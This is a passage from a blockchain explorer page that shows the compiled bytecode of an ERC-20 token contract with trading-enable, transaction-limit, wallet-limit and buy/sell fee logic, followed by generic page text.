1b038216610a145760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161047a565b6006546001600160a01b03848116911614801590610a4057506006546001600160a01b03838116911614155b15610ca35760095460ff16610ad2576006546001600160a01b03848116911614610ad25760405162461bcd60e51b815260206004820152603f60248201527f544f4b454e3a2054686973206163636f756e742063616e6e6f742073656e642060448201527f746f6b656e7320756e74696c2074726164696e6720697320656e61626c656400606482015260840161047a565b600b54811115610b245760405162461bcd60e51b815260206004820152601c60248201527f544f4b454e3a204d6178205472616e73616374696f6e204c696d697400000000604482015260640161047a565b600a546001600160a01b03838116911614610bbe57600c5481610b5b846001600160a01b03165f9081526020819052604090205490565b610b659190611377565b10610bbe5760405162461bcd60e51b815260206004820152602360248201527f544f4b454e3a2042616c616e636520657863656564732077616c6c65742073696044820152627a652160e81b606482015260840161047a565b305f90815260208190526040902054600b548110610bdb5750600b545b600d54600b5490821015908210610bf257600b5491505b808015610c095750600e54600160a01b900460ff16155b8015610c235750600a546001600160a01b03868116911614155b8015610c385750600e54600160a81b900460ff165b8015610c5c57506001600160a01b0385165f9081526002602052604090205460ff16155b8015610c8057506001600160a01b0384165f9081526002602052604090205460ff16155b15610ca057610c8e82610fe7565b478015610c9e57610c9e4761117a565b505b50505b6001600160a01b0383165f9081526002602052604081205460ff1680610ce057506001600160a01b0383165f9081526002602052604090205460ff165b80610d125750600a546001600160a01b03858116911614801590610d125750600a546001600160a01b03848116911614155b15610de8576001600160a01b0384165f9081526020819052604090205482811015610d4f5760405162461bcd60e51b815260040161047a906113c9565b610d598382611364565b6001600160a01b038087165f908152602081905260408082209390935590861681529081208054859290610d8e908490611377565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610dda91815260200190565b60405180910390a350610fe1565b600a546001600160a01b038581169116148015610e1857506009546001600160a01b038481166101009092041614155b15610e3a57606460075483610e2d919061140f565b610e379190611426565b90505b600a546001600160a01b038481169116148015610e6a57506009546001600160a01b038581166101009092041614155b15610e8c57606460085483610e7f919061140f565b610e899190611426565b90505b6001600160a01b0384165f9081526020819052604090205482811015610ec45760405162461bcd60e51b815260040161047a906113c9565b610ece8382611364565b6001600160a01b0386165f90815260208190526040902055610ef08284611364565b6001600160a01b0385165f9081526020819052604081208054909190610f17908490611377565b90915550506001600160a01b038085169086167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610f558587611364565b60405190815260200160405180910390a38115610fdf57305f9081526020819052604081208054849290610f8a908490611377565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fd691815260200190565b60405180910390a35b505b50505050565b600e805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061102d5761102d611445565b60200260200101906001600160a01b031690816001600160a01b031681525050600960019054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561109e573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110c291906113ae565b816001815181106110d5576110d5611445565b6001600160a01b0392831660209182029290920101526009546111009130916101009004168461082b565b60095460405163791ac94760e01b81526101009091046001600160a01b03169063791ac9479061113c9085905f90869030904290600401611459565b5f604051808303815f87803b158015611153575f80fd5b505af1158015611165573d5f803e3d5ffd5b5050600e805460ff60a01b1916905550505050565b600e546040516001600160a01b039091169082156108fc029083905f818181858888f193505050501580156111b1573d5f803e3d5ffd5b5050565b5f602080835283518060208501525f5b818110156111e1578581018301518582016040015282016111c5565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114611215575f80fd5b50565b5f8060408385031215611229575f80fd5b823561123481611201565b946020939093013593505050565b5f805f60608486031215611254575f80fd5b833561125f81611201565b9250602084013561126f81611201565b929592945050506040919091013590565b5f60208284031215611290575f80fd5b813561129b81611201565b9392505050565b5f602082840312156112b2575f80fd5b8135801515811461129b575f80fd5b5f80604083850312156112d2575f80fd5b50508035926020909101359150565b5f80604083850312156112f2575f80fd5b82356112fd81611201565b9150602083013561130d81611201565b809150509250929050565b600181811c9082168061132c57607f821691505b60208210810361134a57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b818103818111156103e8576103e8611350565b808201808211156103e8576103e8611350565b6020808252600a90820152694e6f74206f776e65722160b01b604082015260600190565b5f602082840312156113be575f80fd5b815161129b81611201565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b80820281158282048414176103e8576103e8611350565b5f8261144057634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156114a95784516001600160a01b031683529383019391830191600101611484565b50506001600160a01b0396909616606085015250505060800152939250505056fea26469706673582212203bf07754c1d10977467d4688cd79b73bb6ba9ca81d09d1ef7856f70d55ccf05a64736f6c63430008180033

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610148575f3560e01c806362256589116100bf57806395d89b411161007957806395d89b41146102c6578063a457c2d7146102ce578063a9059cbb146102e1578063bb76d8a5146102f4578063cbe8e207146102fd578063dd62ed3e14610310575f80fd5b8063622565891461025e57806370a08231146102685780637d1db4a5146102905780638da5cb5b146102995780638e26bbe4146102aa5780638f9a55c0146102bd575f80fd5b806323b872dd1161011057806323b872dd146101e25780632fd689e3146101f5578063313ce567146101fe578063395093511461022f57806349bd5a5e146102425780635ce845a914610255575f80fd5b806306fdde031461014c578063095ea7b31461016a5780631694505e1461018d57806318160ddd146101bd5780631ffdf9fa146101cf575b5f80fd5b610154610348565b60405161016191906111b5565b60405180910390f35b61017d610178366004611218565b6103d8565b6040519015158152602001610161565b6009546101a59061010090046001600160a01b031681565b6040516001600160a01b039091168152602001610161565b6003545b604051908152602001610161565b600e546101a5906001600160a01b031681565b61017d6101f0366004611242565b6103ee565b6101c1600d5481565b60405160ff7f0000000000000000000000000000000000000000000000000000000000000012168152602001610161565b61017d61023d366004611218565b6104a2565b600a546101a5906001600160a01b031681565b6101c160075481565b6102666104d8565b005b6101c1610276366004611280565b6001600160a01b03165f9081526020819052604090205490565b6101c1600b5481565b6006546001600160a01b03166101a5565b6102666102b83660046112a2565b610516565b6101c1600c5481565b610154610741565b61017d6102dc366004611218565b610750565b61017d6102ef366004611218565b6107ea565b6101c160085481565b61026661030b3660046112c1565b6107f6565b6101c161031e3660046112e1565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b60606004805461035790611318565b80601f016020809104026020016040519081016040528092919081815260200182805461038390611318565b80156103ce5780601f106103a5576101008083540402835291602001916103ce565b820191905f5260205f20905b8154815290600101906020018083116103b157829003601f168201915b5050505050905090565b5f6103e433848461082b565b5060015b92915050565b5f6103fa84848461094e565b6001600160a01b0384165f908152600160209081526040808320338452909152902054828110156104835760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61049785336104928685611364565b61082b565b506001949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916103e4918590610492908690611377565b6006546001600160a01b031633146105025760405162461bcd60e51b815260040161047a9061138a565b600354600b55600354600c55600354600d55565b6006546001600160a01b031633146105405760405162461bcd60e51b815260040161047a9061138a565b60095460ff16156105935760405162461bcd60e51b815260206004820152601760248201527f43616e6e6f74207265656e61626c652074726164696e67000000000000000000604482015260640161047a565b60098054610100600160a81b031916747a250d5630b4cf539739df2c5dacb4c659f2488d001790556040805163c45a015560e01b81529051737a250d5630b4cf539739df2c5dacb4c659f2488d91829163c45a0155916004808201926020929091908290030181865afa15801561060c573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061063091906113ae565b6001600160a01b031663e6a4390530836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561067b573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061069f91906113ae565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156106e9573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061070d91906113ae565b600a80546001600160a01b0319166001600160a01b0392909216919091179055506009805460ff1916911515919091179055565b60606005805461035790611318565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156107d15760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161047a565b6107e033856104928685611364565b5060019392505050565b5f6103e433848461094e565b6006546001600160a01b031633146108205760405162461bcd60e51b815260040161047a9061138a565b600791909155600855565b6001600160a01b03831661088d5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161047a565b6001600160a01b0382166108ee5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161047a565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166109b25760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161047a565b6001600160a01b038216610a145760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161047a565b6006546001600160a01b03848116911614801590610a4057506006546001600160a01b03838116911614155b15610ca35760095460ff16610ad2576006546001600160a01b03848116911614610ad25760405162461bcd60e51b815260206004820152603f60248201527f544f4b454e3a2054686973206163636f756e742063616e6e6f742073656e642060448201527f746f6b656e7320756e74696c2074726164696e6720697320656e61626c656400606482015260840161047a565b600b54811115610b245760405162461bcd60e51b815260206004820152601c60248201527f544f4b454e3a204d6178205472616e73616374696f6e204c696d697400000000604482015260640161047a565b600a546001600160a01b03838116911614610bbe57600c5481610b5b846001600160a01b03165f9081526020819052604090205490565b610b659190611377565b10610bbe5760405162461bcd60e51b815260206004820152602360248201527f544f4b454e3a2042616c616e636520657863656564732077616c6c65742073696044820152627a652160e81b606482015260840161047a565b305f90815260208190526040902054600b548110610bdb5750600b545b600d54600b5490821015908210610bf257600b5491505b808015610c095750600e54600160a01b900460ff16155b8015610c235750600a546001600160a01b03868116911614155b8015610c385750600e54600160a81b900460ff165b8015610c5c57506001600160a01b0385165f9081526002602052604090205460ff16155b8015610c8057506001600160a01b0384165f9081526002602052604090205460ff16155b15610ca057610c8e82610fe7565b478015610c9e57610c9e4761117a565b505b50505b6001600160a01b0383165f9081526002602052604081205460ff1680610ce057506001600160a01b0383165f9081526002602052604090205460ff165b80610d125750600a546001600160a01b03858116911614801590610d125750600a546001600160a01b03848116911614155b15610de8576001600160a01b0384165f9081526020819052604090205482811015610d4f5760405162461bcd60e51b815260040161047a906113c9565b610d598382611364565b6001600160a01b038087165f908152602081905260408082209390935590861681529081208054859290610d8e908490611377565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610dda91815260200190565b60405180910390a350610fe1565b600a546001600160a01b038581169116148015610e1857506009546001600160a01b038481166101009092041614155b15610e3a57606460075483610e2d919061140f565b610e379190611426565b90505b600a546001600160a01b038481169116148015610e6a57506009546001600160a01b038581166101009092041614155b15610e8c57606460085483610e7f919061140f565b610e899190611426565b90505b6001600160a01b0384165f9081526020819052604090205482811015610ec45760405162461bcd60e51b815260040161047a906113c9565b610ece8382611364565b6001600160a01b0386165f90815260208190526040902055610ef08284611364565b6001600160a01b0385165f9081526020819052604081208054909190610f17908490611377565b90915550506001600160a01b038085169086167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610f558587611364565b60405190815260200160405180910390a38115610fdf57305f9081526020819052604081208054849290610f8a908490611377565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fd691815260200190565b60405180910390a35b505b50505050565b600e805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061102d5761102d611445565b60200260200101906001600160a01b031690816001600160a01b031681525050600960019054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561109e573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110c291906113ae565b816001815181106110d5576110d5611445565b6001600160a01b0392831660209182029290920101526009546111009130916101009004168461082b565b60095460405163791ac94760e01b81526101009091046001600160a01b03169063791ac9479061113c9085905f90869030904290600401611459565b5f604051808303815f87803b158015611153575f80fd5b505af1158015611165573d5f803e3d5ffd5b5050600e805460ff60a01b1916905550505050565b600e546040516001600160a01b039091169082156108fc029083905f818181858888f193505050501580156111b1573d5f803e3d5ffd5b5050565b5f602080835283518060208501525f5b818110156111e1578581018301518582016040015282016111c5565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114611215575f80fd5b50565b5f8060408385031215611229575f80fd5b823561123481611201565b946020939093013593505050565b5f805f60608486031215611254575f80fd5b833561125f81611201565b9250602084013561126f81611201565b929592945050506040919091013590565b5f60208284031215611290575f80fd5b813561129b81611201565b9392505050565b5f602082840312156112b2575f80fd5b8135801515811461129b575f80fd5b5f80604083850312156112d2575f80fd5b50508035926020909101359150565b5f80604083850312156112f2575f80fd5b82356112fd81611201565b9150602083013561130d81611201565b809150509250929050565b600181811c9082168061132c57607f821691505b60208210810361134a57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b818103818111156103e8576103e8611350565b808201808211156103e8576103e8611350565b6020808252600a90820152694e6f74206f776e65722160b01b604082015260600190565b5f602082840312156113be575f80fd5b815161129b81611201565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b80820281158282048414176103e8576103e8611350565b5f8261144057634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156114a95784516001600160a01b031683529383019391830191600101611484565b50506001600160a01b0396909616606085015250505060800152939250505056fea26469706673582212203bf07754c1d10977467d4688cd79b73bb6ba9ca81d09d1ef7856f70d55ccf05a64736f6c63430008180033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.